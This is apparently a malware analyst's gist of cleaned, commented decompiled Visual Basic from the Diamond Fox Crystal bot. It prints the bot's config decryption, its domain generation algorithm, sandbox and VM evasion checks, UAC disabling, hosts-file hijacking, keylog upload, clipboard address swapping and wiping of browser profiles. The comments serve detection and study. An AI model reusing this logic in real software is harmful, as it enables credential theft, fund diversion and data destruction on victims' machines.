@hasherezade
Last active April 5, 2017 23:17
Diamond Fox Crystal, main module
'cleaned version of the decrypting function from Module1.vb
Public Sub decrypt(str1_arg, str2_arg) '406ABC
'Purpose: XOR-decrypts the bytes of str1_arg against a 286-entry key table built from
'str2_arg (see the table setup below) and leaves the plaintext in `result`.
'Cleaned rendering of the raw listing at 406ABC further down in this file, with
'var_A0 -> karr, var_AC -> s2_bound, var_B6 -> i1, var_B0 -> j1, var_B4 -> k1.
'Parameters: str1_arg - ciphertext (string, converted to a byte array below);
'            str2_arg - key material (string, converted to a byte array below).
'Result:     `result` - decrypted bytes converted back to a Unicode string.
'Decompiler output: karr, str1, str2, j1 and result are used without a Dim.
'Data Table: 401634
Dim s2_bound As Long
Dim i1 As Integer
'NOTE(review): duplicate Dim of i1. The raw listing declares var_B0 As Long at this
'position and var_B0 corresponds to j1 (the str2 index), so this was presumably `Dim j1 As Long`.
Dim i1 As Long
Dim k1 As Long
'Every runtime error, including the out-of-range array reads discussed below, is skipped.
On Error Resume Next
'&H80 = vbFromUnicode: both strings become byte arrays.
str1 = StrConv(str1_arg, &H80, 0)
str2 = StrConv(str2_arg, &H80, 0)
s2_bound = UBound(str2, 1)
'Table entries 0..255 start as the identity.
For index1 = 0 To &HFF: _indx = index1 'Long
karr(_indx ) = CInt(_indx )
Next index1 'Long
'Entries 256..285 (&H100..&H11D) hold 0..29, giving 286 entries in total.
For var_F4 = &H100 To &H11D: _indx = var_F4 'Long
karr(_indx ) = CInt(_indx Xor &H100)
Next var_F4 'Long
'The last six key bytes overwrite entries 250..255 (&HF9 + 1..6); the first six key
'bytes, mixed with the same trailing bytes, overwrite entries 0..5.
For var_FC = 1 To 6: _indx = var_FC 'Long
karr((_indx + &HF9)) = CInt(str2((s2_bound - _indx )))
karr((_indx - 1)) = CInt(str2((_indx - 1))) Xor (255 - CInt(str2((s2_bound - _indx ))))
Next var_FC 'Long
i1 = 0
k1 = 0
For index = 0 To UBound(str1, 1): _indx = index 'Long
'This reset cannot fire for a non-empty key (s2_bound >= 0), so j1 is never wrapped;
'it is presumably a garbled rendering of `j1 > s2_bound`. Once j1 runs past the key,
'the str2(j1) read below errors and On Error Resume Next skips the whole assignment,
'which would leave that ciphertext byte unchanged - verify against the binary.
If (0 > s2_bound) Then
j1 = 0
End If
'k1 sweeps the whole table; after entry 285 it restarts at 0 and at 5 on alternate
'passes. i1 toggles via Not (0 <-> -1); the decompiler appears to print True as &HFF.
If ((k1 > &H11D) And (i1 = 0)) Then
k1 = 0
i1 = Not(i1)
End If
If ((k1 > &H11D) And (i1 = &HFF)) Then
k1 = 5
i1 = Not(i1)
End If
'Core transform: plaintext byte = ciphertext byte Xor table entry Xor key byte.
str1(_indx) = CByte(CInt(str1(_indx)) Xor karr(k1) Xor CInt(str2(j1)))
j1 = (j1 + 1)
k1 = (k1 + 1)
Next index 'Long
'&H40 = vbUnicode: byte array back to a string.
loc_406AB2: result = CStr(StrConv(str1, &H40, 0))
loc_406ABA: Exit Sub
End Sub
'cleaned version of the DGA from Module1.vb
Public Sub domain_generate(arg_C) '407084
'Purpose: domain generation algorithm (DGA). Derives one C2 URL from today's date and the
'config fields Me(92) & Me(124) (character set), Me(120) (seed date), Me(116) (period
'length in days), Me(108) (domain length) and Me(148) (pipe-separated TLD list).
'Cleaned rendering of the raw listing at 407084 further down in this file.
'Parameter: arg_C - day offset added to the period start; Proc_0_10 calls this with
'           0..Me(112) to enumerate several candidates for the same period.
'Result:    `domain_name` = "http://" & <name>.<tld> & "/gate.php". The fixed
'           "/gate.php" path is a network indicator for this family.
'Decompiler output: baseStr, ext and domain_name are used without a Dim, and domain_name
'is never cleared here - presumably module-level state reset by the caller.
'Data Table: 401634
Dim var_BC As Double
Dim var_AC As Long
Dim var_A8 As Double
Dim vDay As Single
Dim vMonth As Single
Dim vYear As Single
Dim arg_2008 As Variant
Dim var_9C As Long
On Error Resume Next
'Alphabet the name is drawn from.
baseStr = Me(92) & Me(124)
'Seed date and the number of whole days elapsed since it.
var_BC = CDate(DateValue(Me(120)))
var_AC = CLng((DateValue(CStr(Now)) - CDate(var_BC)))
If (var_AC < 0) Then
Exit Sub
'Unreachable: Exit Sub above already returned.
End
End If
'Round the elapsed days down to a multiple of Me(116): every call within one period
'starts from the same base date, shifted by arg_C days.
var_A8 = CDate((var_BC + CDbl((var_AC - (var_AC Mod Me(116))))))
vDay = CDbl(Day(CDate(CDate((var_A8 + CDbl(arg_C))))))
vMonth = CDbl(Month(CDate(CDate((var_A8 + CDbl(arg_C))))))
vYear = CDbl(Year(CDate(CDate((var_A8 + CDbl(arg_C))))))
'TLD pick. VB evaluates Mod before Xor, so the index is vMonth Xor (vDay Mod UBound);
'an index past UBound errors and is swallowed by On Error Resume Next.
arg_2008 = Split(Me(148), "|", -1, 0)
ext = arg_2008((CLng(vMonth) Xor CLng(vDay) Mod UBound(arg_2008, 1)))
'Per-period seed mixed from year/month/day through Tan and Cos; Abs keeps it non-negative.
var_9C = (((CLng(vYear) And &HFF00) / &H100) * CLng((vDay * Tan(CDbl((CLng(vYear) And &HFF))))) Xor CLng(Cos((vMonth * CDbl(&HA)))))
var_9C = Abs(var_9C)
If CBool((var_9C Mod 2)) Then
var_9C = var_9C Xor (CLng(vYear) / CLng((vMonth * vDay)))
End If
'Emit Me(108) characters. Abs((x Mod Len) - Len) yields a Mid$ start in 1..Len when the
'Mod result is non-negative; Mid$ simply returns "" for a start past the end.
For var_11C = 1 To Me(108): var_C4 = var_11C 'Long
domain_name = domain_name & Mid$(baseStr, Abs((((var_9C * var_C4 Xor CLng((CDbl(var_9C) / CDbl(2)))) Mod Len(baseStr)) - Len(baseStr))), 1)
Next var_11C 'Long
domain_name = "http://" & LCase$(domain_name & "." & ext) & "/gate.php"
Exit Sub
End Sub
'Object: Module1
'(cleaned manually)
Public Sub main
'Purpose: entry point. Locates and decrypts the embedded configuration, runs the
'parameter-gated anti-analysis checks, installs/persists, optionally disables UAC, selects
'a C2 domain and then spins forever in the Proc_0_1 main loop.
'Decompiler output: many locals (var_88, var_8C, var_90, var_114, var_124, var_C8) are
'used without a Dim; var_118/var_11C are declared Long but indexed like arrays.
'Data Table: 401634
Dim MemVar_40B3A4 As Global
Dim var_A8 As String
Dim var_94 As String
Dim var_118 As Long
Dim var_11C As Long
Dim var_F8 As Integer
Dim var_144 As String
Dim var_98 As String
loc_4096D4: On Error Resume Next
loc_4096E4: var_90 = MemVar_40B3A4.App
'Hides the process from the Windows task list (VB App.TaskVisible).
loc_4096EC: App.TaskVisible = False
'Own executable path; the var_8C/var_94/var_98 shuffle is garbled, but Me(88) is used
'as the own-file path by FileCopy/SetAttr below and in make_persistent.
loc_40970A: GetModuleFileName(0, var_8C, &HFF)
loc_409743: var_94 = var_98
loc_40974E: var_98 = Replace(var_94, vbNullString, 0, 1, -1, 0)
loc_409757: var_8C = var_94
loc_40975D: Me(88) = var_98
loc_409768: fetch_logical_disks(StrConv(var_98, vbUnicode))
'Config lookup: first a resource named "L!NK" (Proc_0_40 / LoadResData); if that is
'empty, the config is read from the executable body itself, after a separator of
'22 '-' characters (String$(&H16, "-")).
loc_409787: If Not((Len(Proc_0_40_40628C("L!NK")) <> 0)) Then
loc_4097A1: Me.Global.LoadResData "L!NK", "1", var_C8
loc_4097D6: If Not((Len(CStr(StrConv(var_C8, &H40, 0))) <> 0)) Then
loc_40982E: var_88 = CStr(Split(file_binary_open(Me(88)), CVar(String$(&H16, "-")), -1, 0)(1))
loc_409845: End If
loc_409847: End If
'The config key comes from Proc_0_19, which only depends on Len(var_88) - i.e. the key
'is recoverable from the encrypted blob alone (useful for config extraction).
loc_40985F: PARAMS_STORAGE = decrypt(var_88, Proc_0_19_404CD8(var_88))
loc_409877: If Not((Len(PARAMS_STORAGE) <> 0)) Then
loc_40987C: End
loc_40987E: End If
'Anti-analysis checks, each gated by a config flag (see check_sandbox_dll and
'check_volume_serials for what the numeric arguments select).
loc_409897: If CBool(load_param(7, 0)) Then
loc_4098A4: check_sandbox_dll(1)
loc_4098A9: End If
loc_4098C2: If CBool(load_param(8, 0)) Then
loc_4098CF: check_sandbox_dll(3)
loc_4098D4: End If
loc_4098ED: If CBool(load_param(6, 0)) Then
loc_4098FA: check_sandbox_dll(5)
loc_4098FF: End If
loc_409918: If CBool(load_param(9, 0)) Then
loc_409925: check_volume_serials(1)
loc_40992A: End If
loc_40993B: var_94 = load_param(&HA, 0)
loc_409943: If CBool(var_94) Then
loc_409948: Proc_0_2_404004(var_94)
loc_40994D: End If
loc_409966: If CBool(load_param(&HB)) Then
loc_409973: check_sandbox_dll(2)
loc_409978: End If
loc_409991: If CBool(load_param(&HC, 0)) Then
loc_40999E: check_volume_serials(2)
loc_4099A3: End If
loc_4099BC: If CBool(load_param(&HD, 0)) Then
loc_4099C9: check_volume_serials(3)
loc_4099CE: End If
loc_4099E7: If CBool(load_param(&HE, 0)) Then
loc_4099EC: delay_execution(0)
loc_4099F1: End If
loc_409A0A: If CBool(load_param(&H12)) Then
loc_409A17: check_sandbox_dll(4)
loc_409A1C: End If
'Me(92) = base64-decoded param 3. It is reused as the mutex name below, as the key for
'encrypted params in load_param and as part of the DGA alphabet in domain_generate.
loc_409A36: Me(92) = base64_decode(load_param(3, 0))
loc_409A46: var_118 = Me(104)
loc_409A5D: var_118(28) = load_param(&H15, &HFF)
loc_409A79: var_118(32) = load_param(&H16, &HFF)
loc_409A95: var_118(40) = load_param(&H24, &HFF)
loc_409AB3: var_118(58) = CBool(load_param(&H1A, 0))
loc_409AC7: init_globals(0, 0)
loc_409ADA: var_90 = Me.Global.App
'Installation state machine: running under the install name from the install dir copies
'itself and relaunches; otherwise the long branch below is the installed instance, and
'the final Else (MkDir + modify_bot_install) is the first run. The End If nesting is as
'the decompiler emitted it.
loc_409AF7: If (App.EXEName = MY_APPNAME) Then
loc_409B08: If (MY_DIR = Me(40)) Then
loc_409B17: FileCopy Me(88), MY_APPNAME
loc_409B23: shell_execute(MY_APPNAME)
loc_409B2A: End
loc_409B2F: Else
loc_409B3D: If (Me(88) = MY_APPNAME) Then
loc_409B47: var_11C = Me(104)
loc_409B5E: var_11C(16) = load_param(0, &HFF)
loc_409B7B: var_11C(0) = CLng(load_param(1, &HFF))
loc_409B97: var_11C(20) = load_param(2, &HFF)
loc_409BB3: var_11C(24) = load_param(4, &HFF)
loc_409BCF: var_11C(36) = load_param(5, &HFF)
loc_409BED: var_11C(48) = CBool(load_param(&H17, 0))
loc_409C0B: var_11C(50) = CBool(load_param(&H18, 0))
loc_409C29: var_11C(52) = CBool(load_param(&H19, 0))
loc_409C47: var_11C(56) = CBool(load_param(&H22, 0))
loc_409C65: var_11C(54) = CBool(load_param(&H21, 0))
loc_409C83: var_11C(60) = CBool(load_param(&H13, 0))
loc_409CA1: var_11C(62) = CBool(load_param(&H1D, 0))
loc_409CBF: var_11C(66) = CBool(load_param(&H20, 0))
loc_409CCE: var_11C = 0
'Single-instance guard: a named mutex (name = Me(92), a host-based indicator). &HB7 is
'183 = ERROR_ALREADY_EXISTS, so a second instance exits; var_114 presumably holds the
'last DLL error (the Set var_90 = Err() line suggests Err.LastDllError - confirm).
loc_409CDB: var_94 = Me(92)
loc_409CE9: CreateMutex(0, 1, var_94)
loc_409D05: Set var_90 = Err()
loc_409D0B: Call {A4C466B8-499F-101B-BB7800AA00383CBB}.Method_Proc_0_0_40A064C (var_114, StrConv(Me(92), vbUnicode), var_94)
loc_409D1C: If (var_114 = &HB7) Then
loc_409D21: End
loc_409D23: End If
'Attribute 6 = vbHidden (2) + vbSystem (4) on the executable and its directory.
loc_409D2F: SetAttr Me(88), 6
loc_409D40: SetAttr MY_DIR, 6
loc_409D5E: If CBool(load_param(&H14, 0, var_11C)) Then
loc_409D63: Proc_0_10_40655C(var_11C)
loc_409D6F: If Proc_0_30_4060D8(0) Then
loc_409D8C: modify_bot_install("1", 0)
loc_409D94: End If
loc_409D96: End If
'UnknownFunc(&HFF) gates the elevated branch; given the HKLM writes that follow it is
'presumably an "is administrator" check - confirm.
loc_409D9F: If UnknownFunc(&HFF) Then
loc_409DBB: If CBool(load_param(&H10, 0)) Then
loc_409DD2: disable_tskmgr_regtools("1", "1")
loc_409DDE: End If
loc_409DF7: If CBool(load_param(&H11, 0)) Then
loc_409E0E: disable_tskmgr_regtools("0", "1")
loc_409E1A: End If
'UAC disablement via WScript.Shell.RegWrite: UACDisableNotify and EnableLUA are both
'set to REG_DWORD var_F8 = 0 under HKLM. Writes to these two values are a high-value
'detection point (Sysmon/EDR registry telemetry) and require an elevated process.
loc_409E21: Set var_124 = WSCRIPT_OBJ
loc_409E27: var_A8 = "HKLM\Software\Microsoft\Security Center\UACDisableNotify"
loc_409E2D: var_F8 = 0
loc_409E33: var_144 = "REG_DWORD"
loc_409E3C: Call var_124.RegWrite
loc_409E44: var_A8 = "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"
loc_409E4A: var_F8 = 0
loc_409E50: var_144 = "REG_DWORD"
loc_409E59: Call var_124.RegWrite
loc_409E63: Set var_124 = Nothing
loc_409E83: If (CBool(load_param(&H1E, 0, var_144, var_F8, var_A8)) = 0) Then
loc_409E98: write_to_file(OFF_C, 0, var_144)
loc_409EA0: End If
loc_409EA5: Else
'Not elevated: param &HF selects Proc_0_20, which re-prompts the user via "RunAs".
loc_409EC0: If CBool(load_param(&HF, 0, var_F8)) Then
loc_409EC5: Proc_0_20_4054D4(var_A8)
loc_409ECA: End If
loc_409EDC: write_to_file(OFF_C, 0)
loc_409EE4: End If
'Param &H23: Proc_0_8 deletes other .exe/.vbs files; param &H1F: Proc_0_7 wipes browser profiles.
loc_409EFF: If CBool(load_param(&H23, 0)) Then
loc_409F04: Proc_0_8_405EC0(0)
loc_409F09: End If
loc_409F22: If CBool(load_param(&H1F)) Then
loc_409F27: Proc_0_7_404894(0)
loc_409F2C: End If
'Argument 0 (not True) enables the schtasks branch inside make_persistent.
loc_409F33: make_persistent(0)
loc_409F5F: If (get_attribute1(POS_PATH) Or (CBool(load_param(&H1C, 0)) = &HFF)) Then
loc_409F66: Me(168) = &HFF
loc_409F6B: End If
loc_409F7A: fingerprint_system(0)
'Proc_0_10 selects MY_DOMAIN (hard-coded list or DGA) and exits the process if none answers.
loc_409F84: Proc_0_10_40655C()
loc_409F95: If get_attribute1(LOGNAME) Then
loc_409F9A: Proc_0_32_4051F0()
loc_409FA2: Else
loc_409FBD: If CBool(load_param(&H1B)) Then
loc_409FC2: Proc_0_31_4046A4(0)
loc_409FC7: End If
loc_409FC9: End If
loc_409FD2: If Me(170) Then
loc_409FDC: var_94 = 0
loc_409FEA: Proc_0_29_4059BC(&HB)
loc_409FF2: End If
loc_409FF4: Proc_0_30_4060D8(var_94)
'Main loop: `If &HFF` is always true, so this is an unconditional loop running one
'Proc_0_1 iteration plus DoEvents per pass until the process is killed.
loc_409FF9: ' Referenced from: 40A010
loc_409FFD: If &HFF Then
loc_40A002: Proc_0_1_4087AC()
loc_40A009: DoEvents()
loc_40A010: GoTo loc_409FF9
loc_40A013: End If
loc_40A013: End If
loc_40A013: End If
loc_40A018: Else
'First run: create the install directory and install.
loc_40A031: MkDir Me(52) & Me(144) & "\"
loc_40A057: modify_bot_install("1", &HFF)
loc_40A05F: End If
loc_40A063: Exit Sub
End Sub
Public Sub Proc_0_1_4087AC
'Purpose: one iteration of the main loop (called from main with DoEvents between passes).
'Uses the module counters MemVar_402104.global_* to schedule: C2 polling and hosts-file
'update, keylog upload, clipboard replacement, several timed sub-tasks, and the POS
'module. Each pass sleeps 4 x 100 ms plus a final 500 ms.
'Decompiler output: var_88, var_8C, var_A0, var_B4 are used without a Dim, and the
'module globals are shown as Dim lines although they persist across calls.
'Data Table: 401634
Dim MemVar_402104.global_0 As Long
Dim var_90 As String
Dim MemVar_402104.global_20 As Long
Dim clipboard As Clipboard
Dim MemVar_402104.global_16 As Long
Dim MemVar_402104.global_4 As Long
Dim MemVar_402104.global_8 As Long
Dim MemVar_402104.global_12 As Long
Dim MemVar_402104.global_24 As Long
loc_40837C: On Error Resume Next
'Every Me(104) passes: poll the C2 and refresh the hosts file.
loc_408394: MemVar_402104.global_0 = (MemVar_402104.global_0 + 1)
loc_4083A7: If (MemVar_402104.global_0 = Me(104)) Then
loc_4083AC: cnc_post_and_read(MemVar_402104.global_0)
'Hosts-file hijack: fetch MY_DOMAIN?u=1, and if it differs from the current HOSTS_PATH
'content, overwrite the hosts file with it (DNS redirection; a file-integrity indicator).
loc_4083BE: If Not(get_attribute1(OFF_C)) Then
loc_4083D3: var_88 = MY_DOMAIN & "?u=" & "1"
loc_4083E5: UnknownFunc(var_88)
loc_408409: var_8C = process_data(var_88, &HFF, 0)
loc_408418: var_90 = file_binary_open(HOSTS_PATH, StrConv(var_88, vbUnicode))
loc_408423: If (var_90 <> var_8C) Then
loc_408430: write_to_file(HOSTS_PATH, var_8C)
loc_408435: End If
loc_408437: End If
'Keylog exfiltration: upload KEYS_C whenever its size changed since the last upload.
loc_40844E: If (MemVar_402104.global_20 <> FileLen(KEYS_C)) Then
loc_408462: MemVar_402104.global_20 = FileLen(KEYS_C)
loc_408488: post_content(KEYS_C, Proc_0_49_404F40(7, MemVar_402104.global_20))
loc_408494: End If
loc_4084A2: MemVar_402104.global_0 = 0
loc_4084A5: End If
loc_4084AE: Sleep(&H64)
'Clipboard replacement: when the configured string Me(140) is 34 (&H22) chars long and
'the clipboard holds a different 34-char string starting with '1' (&H31), the clipboard is
'overwritten with Me(140). That shape is consistent with a legacy Bitcoin address swapper -
'confirm. Note var_A0 is taken from var_90 rather than the GetText result var_B4; the
'decompiler appears to have dropped an assignment here.
loc_4084C1: If (Len(Me(140)) = &H22) Then
loc_4084DE: Me.Global.Clipboard.GetText var_B4
loc_4084E6: var_A0 = var_90
loc_4084F8: If (var_A0 <> Me(140)) Then
loc_408513: If ((AscW(var_A0) = &H31) And (Len(var_A0) = &H22)) Then
loc_408529: Set clipboard = Me.Global.Clipboard
loc_408531: clipboard.Clear
loc_408544: clipboard.SetText Me(140), var_B4
loc_40854D: Set clipboard = Nothing
loc_408551: End If
loc_408553: End If
loc_408555: End If
loc_40855E: Sleep(&H64)
'Timed sub-tasks, each firing every 30 (&H1E) passes while its Me(...) flag is set.
loc_40856A: If Me(164) Then
loc_408582: MemVar_402104.global_16 = (MemVar_402104.global_16 + 1)
loc_408595: If (MemVar_402104.global_16 = &H1E) Then
loc_40859A: Proc_0_42_408E68(MemVar_402104.global_16, var_90, MemVar_402104.global_0)
loc_4085AB: MemVar_402104.global_16 = 0
loc_4085AE: End If
loc_4085B0: End If
loc_4085B9: Sleep(&H64)
loc_4085C5: If Me(166) Then
loc_4085DD: MemVar_402104.global_4 = (MemVar_402104.global_4 + 1)
loc_4085F0: If (MemVar_402104.global_4 = &H1E) Then
loc_408608: Proc_0_29_4059BC(6, 0, MemVar_402104.global_4)
loc_40861C: MemVar_402104.global_4 = 0
loc_40861F: End If
loc_408621: End If
loc_40862A: Sleep(&H64)
'Persistence is re-applied periodically (argument &HFF skips the schtasks branch).
loc_408636: If Me(170) Then
loc_40864E: MemVar_402104.global_8 = (MemVar_402104.global_8 + 1)
loc_408661: If (MemVar_402104.global_8 = &H1E) Then
loc_40866B: make_persistent(&HFF, MemVar_402104.global_8, MemVar_402104.global_4)
loc_40867C: MemVar_402104.global_8 = 0
loc_40867F: End If
loc_408681: End If
loc_40868A: Sleep(&H64)
'POS module: if present, every 420 (&H1A4) passes kill it, upload OUTPUT_TXT when it
'grew, and restart it; if absent, download it from MY_DOMAIN?p=13 to POS_PATH.
loc_408699: If (Me(168) = &HFF) Then
loc_4086AB: If (get_attribute1(POS_PATH, MemVar_402104.global_8, MemVar_402104.global_16) = &HFF) Then
loc_4086C3: MemVar_402104.global_12 = (MemVar_402104.global_12 + 1)
loc_4086D6: If (MemVar_402104.global_12 = &H1A4) Then
loc_4086E0: kill_task(POS_EXE, MemVar_402104.global_12)
loc_4086FA: If (MemVar_402104.global_24 <> FileLen(OUTPUT_TXT)) Then
loc_40870E: MemVar_402104.global_24 = FileLen(OUTPUT_TXT)
loc_408734: post_content(OUTPUT_TXT, Proc_0_49_404F40(8, MemVar_402104.global_24), 0)
loc_408740: End If
loc_408749: shell_execute(POS_PATH, 0)
loc_40875A: MemVar_402104.global_12 = 0
loc_40875D: End If
loc_408762: Else
loc_408788: process_and_write_to_file(MY_DOMAIN & "?p=" & CStr(&HD), POS_PATH, &HFF)
loc_408796: End If
loc_408798: End If
loc_4087A1: Sleep(&H1F4)
loc_4087A8: Exit Sub
End Sub
Public Sub Proc_0_2_404004
'Purpose: exits the process when bit &H80 of var_9C(&HB) is set after UnknownFunc(var_9C(0)).
'Called from main with the value of param &HA. var_9C is not declared here and the
'called API is hidden behind UnknownFunc, so what is being tested cannot be told from
'this listing - presumably another environment check (the same End-on-match shape as
'check_sandbox_dll / check_volume_serials).
'Data Table: 401634
loc_403FD4: On Error Resume Next
loc_403FE2: UnknownFunc(var_9C(0))
loc_403FFA: If CBool((var_9C(&HB) And &H80)) Then
loc_403FFF: End
loc_404001: End If
loc_404003: Exit Sub
End Sub
Public Sub delay_execution
'Purpose: stalls execution in 500 ms (&H1F4) Sleep steps until a GetTickCount-based
'elapsed time reaches 500 ms. Gated by config param &HE in main. The tick arithmetic in
'the Loop Until condition is garbled by the decompiler (GetTickCount takes no argument),
'so the real delay length is not recoverable from this listing.
'Data Table: 401634
loc_403C90: On Error Resume Next
loc_403C95: Do 'loop at: 403CBC
loc_403CA6: Sleep(&H1F4)
loc_403CBC: Loop Until Not ((GetTickCount(GetTickCount()) - GetTickCount()) < &H1F4) 'do at: 403C95
loc_403CC1: Exit Sub
End Sub
Public Sub check_sandbox_dll(arg_C) '40479C
'Purpose: anti-sandbox / anti-VM check. Maps arg_C to a DLL base name and exits the
'process if UnknownFunc(name & ".dll") returns non-zero - presumably a module/library
'lookup such as GetModuleHandle or LoadLibrary (confirm against the import table).
'Parameter: arg_C - 1 vboxmrxnp, 2 SbieDll, 3 vmGuestLib, 4 snxhk, 5 pthreadVC. These
'           names are commonly associated with VirtualBox, Sandboxie, VMware and Avast
'           sandbox components respectively (vendor attribution from general knowledge).
'Which checks run is selected by config params 7, 8, 6, &HB and &H12 in main.
'Decompiler output: var_88 is used without a Dim.
'Data Table: 401634
Dim var_8C As Long
loc_4046E4: On Error Resume Next
loc_4046EC: var_8C = arg_C
loc_4046FA: If (var_8C = 1) Then
loc_404702: var_88 = "vboxmrxnp"
loc_404708: Else
loc_404713: If (var_8C = 2) Then
loc_40471B: var_88 = "SbieDll"
loc_404721: Else
loc_40472C: If (var_8C = 3) Then
loc_404734: var_88 = "vmGuestLib"
loc_40473A: Else
loc_404745: If (var_8C = 4) Then
loc_40474D: var_88 = "snxhk"
loc_404753: Else
loc_40475E: If (var_8C = 5) Then
loc_404766: var_88 = "pthreadVC"
loc_404769: End If
loc_404769: End If
loc_404769: End If
loc_404769: End If
loc_404769: End If
'Presence of the DLL terminates the bot; an unknown arg_C leaves var_88 empty and tests ".dll".
loc_404790: If (UnknownFunc(var_88 & ".dll") <> 0) Then
loc_404795: End
loc_404797: End If
loc_404799: Exit Sub
End Sub
Public Sub check_volume_serials(index) '4041F8
'Purpose: anti-analysis check on the system volume serial. Exits the process when
'VOL_SERIAL equals one of three hard-coded serial numbers (presumably serials of known
'analysis environments - this listing gives no attribution).
'Parameter: index - 1 "AC79B241", 2 "70144646", 3 "6C78A9C3" (selected by config params
'           9, &HC and &HD in main).
'Decompiler output: var_88 is used without a Dim; an unknown index compares VOL_SERIAL
'against an empty string.
'Data Table: 401634
Dim _index As Long
loc_40418C: On Error Resume Next
loc_404194: _index = index
loc_4041A2: If (_index = 1) Then
loc_4041AA: var_88 = "AC79B241"
loc_4041B0: Else
loc_4041BB: If (_index = 2) Then
loc_4041C3: var_88 = "70144646"
loc_4041C9: Else
loc_4041D4: If (_index = 3) Then
loc_4041DC: var_88 = "6C78A9C3"
loc_4041DF: End If
loc_4041DF: End If
loc_4041DF: End If
loc_4041ED: If (VOL_SERIAL = var_88) Then
loc_4041F2: End
loc_4041F4: End If
loc_4041F6: Exit Sub
End Sub
Public Sub disable_tskmgr_regtools(arg_C) '404294
'Purpose: writes a REG_DWORD policy value under
'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System via RegWrite, disabling
'either the Registry editor (DisableRegistryTools) or Task Manager (DisableTaskMgr).
'Parameter: arg_C - "1" selects DisableRegistryTools, anything else DisableTaskMgr.
'The value written is not visible here (the RegWrite arguments were collapsed by the
'decompiler; main passes a second argument "1"). Either value name appearing in
'registry telemetry from a user process is a strong indicator.
'Decompiler output: var_88 is used without a Dim.
'Data Table: 401634
Dim var_A0 As Variant
Dim var_D0 As String
loc_404230: On Error Resume Next
loc_40423D: If (arg_C = "1") Then
loc_404245: var_88 = "RegistryTools"
loc_40424B: Else
loc_404250: var_88 = "TaskMgr"
loc_404253: End If
loc_40426A: var_A0 = CVar("HKCU" & "\Software\Microsoft\Windows\CurrentVersion\Policies\System\Disable" & var_88) 'String
loc_404275: var_D0 = "REG_DWORD"
loc_404280: Call MemVar_402104.RegWrite
loc_404292: Exit Sub
End Sub
Public Sub Proc_0_7_404894
'Purpose: browser profile wipe. Force-kills Chrome and Firefox, deletes Chrome's
'"User Data" directory and Firefox's profile directory via Proc_0_14, and removes
'profiles.ini. Gated by config param &H1F in main. Destructive: user data is lost;
'the second Proc_0_14 call passes an extra &HFF whose meaning is not visible here.
'Data Table: 401634
loc_4047DC: On Error Resume Next
loc_4047EC: kill_task("Chrome.exe")
loc_404801: kill_task("firefox.exe")
loc_40483F: Proc_0_14_403F14(Environ$("LOCALAPPDATA") & "\Google\Chrome\User Data")
loc_404868: Proc_0_14_403F14(APPDATA_DIR & "Mozilla\Firefox\Profiles", &HFF)
loc_404885: Kill CVar(APPDATA_DIR & "Mozilla\Firefox\Profiles.ini")
loc_404892: Exit Sub
End Sub
Public Sub Proc_0_8_405EC0
'Purpose: removes competing scripts/executables. Kills wscript.exe, then walks the files
'of APPDATA_DIR, TEMP_DIR and Me(40) (the Files collection is obtained late-bound, most
'likely through a FileSystemObject - confirm) and deletes every file whose name contains
'".exe" or ".vbs", pausing 500 ms before each deletion. Gated by config param &H23.
'Note the `Or` is a bitwise Or of two InStr positions, which is non-zero iff at least one
'substring was found - so it behaves as a logical Or here.
'Decompiler output: var_A0, var_AC, var_A8, var_88 are used without a Dim; the
'LateMemCallLdVar/CAdVar lines are late-binding stubs whose targets are not shown.
'Data Table: 401634
loc_405D80: On Error Resume Next
loc_405D92: var_A0(0) = APPDATA_DIR
loc_405DA2: var_A0(1) = TEMP_DIR
loc_405DB2: var_A0(2) = Me(40)
loc_405DBE: kill_task("wscript.exe")
loc_405DD5: For var_B8 = 0 To 2: var_AC = var_B8 'Long
loc_405DED: LateMemCallLdVar
loc_405DF5: CAdVar
loc_405E08: CAdVar
loc_405E14: For Each var_A8 In MemVar_402104.Files
loc_405E63: If CBool(InStr(1, var_A8.Name, ".exe", 0) Or InStr(1, var_A8.Name, ".vbs", 0)) Then
loc_405E6D: Sleep(&H1F4)
loc_405E8A: Kill CVar(var_A0(var_AC)) & var_A8.Name
loc_405E96: End If
loc_405E9D: Next
loc_405EA8: Next var_B8 'Long
loc_405EB1: Set var_88 = Nothing
loc_405EB9: Set var_A8 = Nothing
loc_405EBF: Exit Sub
End Sub
Public Sub Proc_0_9_4040BC
'Purpose: builds a query-string suffix describing the bot's module state for a C2
'request: "&x=1" when the OFF_C marker file is absent, "&y=1" when POS_PATH exists and
'"&z=1" when LOGNAME exists. Result is left in var_88 (used without a Dim - presumably
'the return value). These parameter names are a useful URL signature.
'Data Table: 401634
loc_40406B: If Not(get_attribute1(OFF_C)) Then
loc_404075: var_88 = "&x=1"
loc_404078: End If
loc_404082: If get_attribute1(POS_PATH) Then
loc_404093: var_88 = var_88 & "&y=1"
loc_404099: End If
loc_4040A3: If get_attribute1(LOGNAME) Then
loc_4040B4: var_88 = var_88 & "&z=1"
loc_4040BA: End If
loc_4040BA: Exit Sub
End Sub
Public Sub Proc_0_10_40655C
'Purpose: C2 selection. If Me(120) is shorter than 11 (&HB) chars it is treated as a DGA
'seed date: params &H25..&H28 are loaded and Me(112)+1 candidate URLs are produced with
'domain_generate; otherwise Me(120) is a CRLF-separated list of hard-coded C2 URLs. The
'first candidate longer than 10 chars that answers "OK" to process_data becomes MY_DOMAIN;
'if none does, the process exits. Each probe is preceded by an internet-connectivity wait.
'Decompiler output: var_90, var_A0, var_8C and domain are used without a Dim, and the
'`0 & domain_generate(...)` concatenation is a garbled use of its result.
'Data Table: 401634
Dim var_94 As Long
Dim arg_2008 As Variant
loc_406350: On Error Resume Next
loc_406361: If (Len(Me(120)) < &HB) Then
loc_40636B: var_94 = Me(104)
loc_406382: var_94(44) = load_param(&H25, &HFF)
loc_40639F: var_94(4) = CLng(load_param(&H26, &HFF))
loc_4063BC: var_94(8) = CLng(load_param(&H27, &HFF))
loc_4063D9: var_94(12) = CLng(load_param(&H28, &HFF))
'One candidate per day offset 0..Me(112), joined with CRLF.
loc_4063FA: For var_A8 = 0 To Me(112): var_90 = var_A8 'Long
loc_406411: var_A0 = 0 & domain_generate(var_90, var_A0, 0)
loc_406422: If (var_90 <> Me(112)) Then
loc_40642E: var_A0 = var_A0 & vbCrLf
loc_406431: End If
loc_406436: Next var_A8 'Long
loc_406460: arg_2008 = Split(var_A0, vbCrLf, -1, 0)
loc_40646A: var_8C = arg_2008
loc_406476: Else
loc_40649F: arg_2008 = Split(Me(120), vbCrLf, -1, 0)
loc_4064A9: var_8C = arg_2008
loc_4064B2: End If
